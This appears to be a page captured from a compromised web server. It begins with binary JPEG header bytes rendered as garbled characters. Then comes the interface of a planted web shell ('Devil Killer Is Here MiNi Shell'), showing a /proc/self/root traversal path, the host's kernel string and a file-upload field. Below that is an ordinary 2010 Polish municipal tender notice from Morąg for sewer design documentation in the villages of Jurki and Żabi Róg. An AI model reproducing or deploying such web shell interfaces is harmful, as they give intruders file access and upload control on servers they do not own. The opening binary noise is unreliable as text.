JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100202/29742-N-2010.html

<p class="kh_header"><b>Morąg: Wykonanie dokumentacji technicznych dla zadań:
1. Budowa kanalizacji sanitarnej we wsi Jurki w Gminie Morąg
2. Budowa kanalizacji sanitarnej we wsi Żabi Róg w Gminie Morąg</b><br>
<b>Numer ogłoszenia: 29742 - 2010; data zamieszczenia: 02.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji technicznych dla zadań:
1. Budowa kanalizacji sanitarnej we wsi Jurki w Gminie Morąg
2. Budowa kanalizacji sanitarnej we wsi Żabi Róg w Gminie Morąg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 Budowa kanalizacji sanitarnej we wsi Jurki - wykonanie dokumentacji technicznej 

Przedmiotem zamówienia jest opracowanie projektu budowlanego- wykonawczego na budowę sieci kanalizacji sanitarnej wraz z przepompowniami kanalizacyjnymi od istniejącej sieci we wsi Jurecki Młyn w kierunku wsi Jurki przy drodze wojewódzkiej nr 528 Morąg - Miłakowo wraz z wioską Jurki. Opracowanie projektowe w zakresie kanalizacji sanitarnej powinno obejmować swoim zasięgiem budynki o numerach:
1,2A,3,3A,4,5,6,7,8,9,10,11,11A,12,13,14,15,16,17,18,19,20,21,22,23,25,27,28,28A,29,30,31,32,33,34,35,37,38,39,40,41,42,43,44,46,47,48,49,50,51,52,53,56,57,61,62,63,64,64A,65,66,6768,69,70,71,72,73,74,75,76,77,78A,79,79A,80,81,82,107,108,124,125,126
oraz niemieszkalne istniejące a także nowo wybudowane oraz będące w budowie i planowane do realizacji (posiadające ważne pozwolenie na budowę).
Sieć kanalizacyjna dla potrzeb  poszczególnych budynków  mieszkalnych i innych produkujących ścieki komunalne powinna być doprowadzona do granicy działki i zakończona studzienką umożliwiającą podłączenie w/w budynków do sieci za pośrednictwem przyłączy kanalizacyjnych których zaprojektowanie i wykonanie nastąpi na koszt Właściciela nieruchomości (budynku).
Lokalizacja studzienki przy granicy danej działki powinna być uzgodniona z jej Właścicielem.
W załączeniu mapa z zaznaczonym kolorem różowym obszarem opracowania oraz mapa z koncepcji gospodarki ściekowej Gminy Morąg obejmująca zlewnię A-5+E.
Projektant powinien odbyć wizytację terenową w celu zapoznania się z warunkami terenowymi i gruntowymi terenu na którym ma być zaprojektowana sieć, celem określenia  kosztów realizacji zadania projektu .Opracowanie powinno zawierać bilans ścieków dla zakresu jw. w rozbiciu na ścieki komunalne i przemysłowe.

Zadanie nr 2 Budowa kanalizacji sanitarnej we wsi Żabi Róg - wykonanie dokumentacji technicznej 

Przedmiotem zamówienia jest opracowanie projektu budowlanego - wykonawczego  na budowę sieci kanalizacji sanitarnej wraz z przepompowniami kanalizacyjnymi na sieci  w zakresie określonym kolorem czerwonym (granice opracowania)  na załączonej kopii mapy ewidencyjnej w skali 1 : 5000  terenu wsi Zabi Róg.  Opracowanie projektowe w zakresie kanalizacji sanitarnej powinno obejmować swoim zasięgiem budynki mieszkalne i niemieszkalne istniejące a w tym nowo wybudowane oraz będące w budowie i planowane do realizacji (posiadające ważne pozwolenie na budowę ) oraz inne budynki znajdujące się w określonych na w/w mapie  granicach opracowania. Sieć kanalizacyjna dla potrzeb  poszczególnych budynków  mieszkalnych i innych produkujących ścieki komunalne powinna być doprowadzona do granicy działki i zakończona studzienką umożliwiającą podłączenie w/w budynków do sieci za pośrednictwem przyłączy kanalizacyjnych których zaprojektowanie i wykonanie nastąpi na koszt Właściciela nieruchomości (budynku).
Lokalizacja studzienki przy granicy danej działki powinna być uzgodniona z jej Właścicielem.
Projektant powinien odbyć wizytację terenową w celu zapoznania się z warunkami terenowymi i gruntowymi terenu na którym ma być zaprojektowana sieć, celem określenia  kosztów realizacji zadania projektu .Opracowanie powinno zawierać bilans ścieków dla zakresu jw. w rozbiciu na ścieki komunalne i przemysłowe.
Ogólna ilość ścieków ujęta w zaprojektowanej sieci kanalizacji sanitarnej dla Żabiego Rogu powinna być sprowadzona do istniejących przepompowni P-18 i P- GAJA 2015 zaznaczonych na załączonej mapie ewidencyjnej lub do przepompowni nowo zaprojektowanej z włączeniem jej do istniejącej kanalizacji tłocznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-3, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dla zadania częściowego nr 1: 2 000.00 PLN (słownie:  dwa tysiące 00/100 PLN)
Dla zadania częściowego nr 2: 2 000.00 PLN (słownie:  dwa tysiące 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykaz wykonanych dokumentacji projektowych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie. (załącznik Nr. 5)
Wykonawca zobowiązany  jest udokumentować  że  wykonał  min.  1 dokumentację sieci kanalizacji  sanitarnej  o  wartości minimum 50 000,00 zł brutto.
.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wg wzoru Załącznika nr 6.
Wykonawca   zobowiązany  jest przedłożyć   właściwe uprawnienia oraz  aktualne  zaświadczenie o przynależności   do   właściwej  Okręgowej   Izby Inżynierów Budownictwa osób  przewidzianych  do  projektowania w  specjalności :  instalacyjnej w  zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych oraz w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.

2. Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień- wg wzoru Załącznika nr 7.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/morag_gmina_miejska/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Morąg
Urząd Miejski w Morągu
Ul. 11 Listopada 9 
14-300 Morąg
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 10:00, miejsce: Gmina Morąg
Urząd Miejski w Morągu
Ul. 11 Listopada 9 
14-300 Morąg
pokój nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa kanalizacji sanitarnej we wsi Jurki - wykonanie dokumentacji technicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie projektu budowlanego- wykonawczego na budowę sieci kanalizacji sanitarnej wraz z przepompowniami kanalizacyjnymi od istniejącej sieci we wsi Jurecki Młyn w kierunku wsi Jurki przy drodze wojewódzkiej nr 528 Morąg - Miłakowo wraz z wioską Jurki. Opracowanie projektowe w zakresie kanalizacji sanitarnej powinno obejmować swoim zasięgiem budynki o numerach:
1,2A,3,3A,4,5,6,7,8,9,10,11,11A,12,13,14,15,16,17,18,19,20,21,22,23,25,27,28,28A,29,30,31,32,33,34,35,37,38,39,40,41,42,43,44,46,47,48,49,50,51,52,53,56,57,61,62,63,64,64A,65,66,6768,69,70,71,72,73,74,75,76,77,78A,79,79A,80,81,82,107,108,124,125,126
oraz niemieszkalne istniejące a także nowo wybudowane oraz będące w budowie i planowane do realizacji (posiadające ważne pozwolenie na budowę).
Sieć kanalizacyjna dla potrzeb  poszczególnych budynków  mieszkalnych i innych produkujących ścieki komunalne powinna być doprowadzona do granicy działki i zakończona studzienką umożliwiającą podłączenie w/w budynków do sieci za pośrednictwem przyłączy kanalizacyjnych których zaprojektowanie i wykonanie nastąpi na koszt Właściciela nieruchomości (budynku).
Lokalizacja studzienki przy granicy danej działki powinna być uzgodniona z jej Właścicielem.
W załączeniu mapa z zaznaczonym kolorem różowym obszarem opracowania oraz mapa z koncepcji gospodarki ściekowej Gminy Morąg obejmująca zlewnię A-5+E.
Projektant powinien odbyć wizytację terenową w celu zapoznania się z warunkami terenowymi i gruntowymi terenu na którym ma być zaprojektowana sieć, celem określenia  kosztów realizacji zadania projektu .Opracowanie powinno zawierać bilans ścieków dla zakresu jw. w rozbiciu na ścieki komunalne i przemysłowe.
ZAKRES OPRACOWANIA PRZYJĘTY DO REALIZACJI PRZEZ WYKONAWCĘ-PROJEKTANTA OBEJMUJE  RÓWNIEŻ:
1.Przygotowanie materiałów do projektowania:
a)Uzyskanie decyzji o lokalizacji inwestycji celu publicznego,
b)Sporządzenie  przez Projektanta  w  imieniu Zamawiającego wniosku o wydanie i uzyskanie warunków przyłączenia do sieci elektroenergetycznej instalacji elektrycznej przepompowni sieciowych (w tym oświetlenia),
c)Pozyskanie na koszt i staraniem Projektanta map sytuacyjno-wysokościowych do celów projektowych. Mapa do celów projektowych sytuacyjno-wysokościowa powinna posiadać aktualną klauzulę właściwego ośrodka geodezyjnego oraz powinna spełniać wymagania określone w ustawie. Zamawiający ma otrzymać mapę numeryczną w formacie danych *.dwg na nośniku CD- R oraz w wersji papierowej. Mapy muszą obejmować inwentaryzację podziemną i nadziemną oraz inwentaryzację drzew, wymaga się również dokonania geodezyjnej aktualizacji umiejscowienia istniejącej infrastruktury

d)Opracowanie na koszt i staraniem Projektanta  warunków gruntowo-wodnych niezbędnych dla potrzeb posadowienia  przepompowni sieciowych ( dla każdej przepompowni oddzielnie) 
e)Określenie na koszt i staraniem Projektanta warunków gruntowo-wodnych niezbędnych dla potrzeb posadowienia  poszczególnych odcinków sieci  w zakresie niezbędnym a określonym przez projektanta.  
f)Opracowanie karty informacyjnej przedsięwzięcia o której mowa w art. 3.1. pkt. 5 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale  społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  (Dz. U. Nr 199, poz. 1227)
g)Wyrysy i wypisy z rejestru ewidencji gruntów objętych opracowaniem
h)Dokonanie uzgodnień (zgodnie z załączonym drukiem) z wszystkimi właścicielami nieruchomości przez które będzie przebiegać zaprojektowana sieć oraz lokalizacją przepompowni a w tym uzyskaniem zgody na :
-	zaprojektowanie na posesji kanalizacji sanitarnej i przepompowni
-	wykonanie robót ziemnych wraz z wykopami w systemie
otwartym   i przecisku sterowanego
-	umieszczenie i pozostawienie na terenie nieruchomości urządzeń podziemnych i naziemnych związanych z realizacją kanalizacji sanitarnej w ramach zaprojektowanego zadania ,
-	lokalizację, umieszczenie i pozostawienie na terenie nieruchomości  przepompowni ścieków wraz z urządzeniem naziemnym i podziemnym zagospodarowania terenu w tym : dróg i placów oraz ogrodzenia, studzienek sieci wodociągowej i zasilania elektroenergetycznego niezbędnych do obsługi przepompowni sieciowej.
-	wyrażenie zgody na wejście na teren nieruchomości na której zlokalizowano i umieszczono przepompownię sieciową wraz z jej zagospodarowaniem naziemnym i podziemnym konserwatora, Właściciela sieci lub Zarządcy celem dokonywania ich przeglądów eksploatacyjnych  i konserwacji

i)Uzyskanie pozostałych warunków technicznych oraz materiałów i danych koniecznych do prawidłowego opracowania dokumentacji technicznej a w tym między innymi uzgodnień i zezwoleń (o ile byłoby to konieczne) na przejścia                 z siecią pod drogami oraz uzyskanie uzgodnienia z Właścicielem  lub Zarządcą  oczyszczalni (sieci) do której będą kierowane ścieki z w/w obszaru na  włączenie projektowanej sieci kanalizacji sanitarnej do istniejącej sieci oraz uzgodnienia z rzeczoznawcami ds. zabezpieczenia p. poż , bhp i ergonomii ,rzeczoznawcę ds. sanitarno - higienicznych (o ile jest to niezbędne)
j)Dokonanie uzgodnień branżowych przy kolizjach z istniejącym uzbrojeniem  i opracowanie ewentualnych projektów dotyczących przełożenia sieci.

2.Opracowanie kompletnej dokumentacji projektowej w zakresie i formie zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16 września 2004 r., Nr 202, poz.2072) obejmującej :

a)Dokumentację budowlano - wykonawczą  sieci kanalizacji sanitarnej wraz z bilansem ścieków i wytycznymi do planu BIOZ oraz częścią formalno-prawną pozwalającą na uzyskanie pozwolenia na budowę  zawierającą między innymi wszystkie uzgodnienia, warunki techniczne, decyzje, postanowienia, wykaz działek  przez które przebiega inwestycja, wypis z rejestru gruntów i oświadczenia  -  6 kpl,
b)Dokumentację geotechniczną dotycząca warunków posadowienia przepompowni  i poszczególnych odcinków sieci (w niezbędnym zakresie) - 6 egz.
c)Dokumentację budowlano-wykonawczą przepompowni sieciowych
kanalizacji sanitarnej i wytycznymi do planu BIOZ wraz z warunkami przyłączenia się do sieci elektroenergetycznej w zakresie przyłącza elektrycznego  przed i zalicznikowego, ogrodzeniem terenu przepompowni, drogami dojazdowymi oraz ich oświetleniem            - 6 kpl,
d)Projekt czasowej organizacji ruchu w przypadku prac na drogach      - 3 egz.
e) Kosztorys inwestorski w formie i treści zgodnej z § 7 Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z 2004 r. Nr 130, poz. 1389 z póżn. zm.) w układzie specyfikacyjnym (tj. z podziałem na poszczególne branże) - 2 kpl,
f)Przedmiary robót z określeniem podstaw wyceny dla branż i rodzajów robót dla zadania jw. (w układzie specyfikacyjnym) - 3 egz.	
g)Zbiorcze zestawienie kosztów uwzględniająca wszystkie koszty (koszt opracowania dokumentacji, wykonania robót z rozbiciem na poszczególne zakresy, nadzór inwestorski, wykup gruntów pod przepompownie, odszkodowania z tytułu prowadzonych robót) 			            - 2 kpl,
h)Specyfikacja techniczna wykonania i odbioru robót                   	- 6 kpl.
i)Szczegółowa specyfikacja techniczna wykonania i odbioru (jeżeli konieczna)              - 6kpl.
3.Całość opracowania w formie elektronicznej (część tekstowa opracowania w formacie *.doc [MS Word] i *.pdf [Adobe Reader] , część rysunkowa w formacie *.dwg lub *.dxf [Autocad] oraz w *.pdf [Adobe Reader] ; kosztorys i przedmiar robót                        w formacie *.ath [Norma] oraz *.pdf [Adobe Reader]  - 2 egz. (płyta CD lub DVD).

4.  Projektant powinien uzyskać:
a)decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia polegającego na budowie sieci kanalizacji sanitarnej z przepompowniami we  wsi Jurki wraz z raportem o oddziaływaniu przedsięwzięcia na środowisko (gdy zajdzie konieczność jego sporządzenia)
b)opinię Zespołu Uzgodnień Dokumentacji Projektowej
